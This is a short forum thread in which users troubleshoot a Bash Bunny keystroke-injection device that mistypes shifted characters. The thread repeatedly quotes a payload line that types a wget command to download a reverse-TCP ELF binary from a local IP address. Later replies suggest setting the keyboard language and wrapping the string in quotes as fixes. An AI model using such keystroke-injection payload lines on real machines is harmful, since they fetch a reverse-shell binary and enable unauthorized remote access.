FredW Posted December 3, 2020 Share Posted December 3, 2020 It seems like my bash bunny occasionally mistype... _ becomes - : becomes ; uppercase becomes lowercase All of these have a thing in common, which is a shift character being typed as if not shifted. Ex1. Q STRING wget -O reverse_tcp_linux.elf 192.168.1.128:8000/reverse_tcp_linux.elf becomes wget -O reverse_tcp_linux.elf 192.168.1.128;8000/reverse_tcp_linux.elf Ex2. Q STRING wget -O reverse_tcp_linux.elf 192.168.1.128:8000/reverse_tcp_linux.elf becomes wget -O reverse_tcp_linux.elf 192.168.1.128:8000/reverse-tcp_linux.elf Ex3. Q STRING wget -O reverse_tcp_linux.elf 192.168.1.128:8000/reverse_tcp_linux.elf becomes wget -O reverse_tcp_linux.elf 192.168.1.128:8000/reverse_tcp-linux.elf These 3 examples are what had happened to me before, but I doubt this could happen anywhere with a shifted character. Anyone know what is the issue here? any work around? Thank you! Quote Link to comment Share on other sites More sharing options...
chrizree Posted December 3, 2020 Share Posted December 3, 2020 Are you specifying DUCKY_LANG in your payloads? Not that I think it would make any real difference, but better to try than not Quote Link to comment Share on other sites More sharing options...
DangerAnt Posted January 13, 2021 Share Posted January 13, 2021 I have also run into this problem. i was able to get around it and completely resolve the problem with the use of Quotes ("). In other words when using QUACK STRING put your command in Quotes for your first example try putting Q STRING "wget -O reverse_tcp_linux.elf 192.168.1.128:8000/reverse_tcp_linux.elf" in your payload instead of Q STRING wget -O reverse_tcp_linux.elf 192.168.1.128:8000/reverse_tcp_linux.elf Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.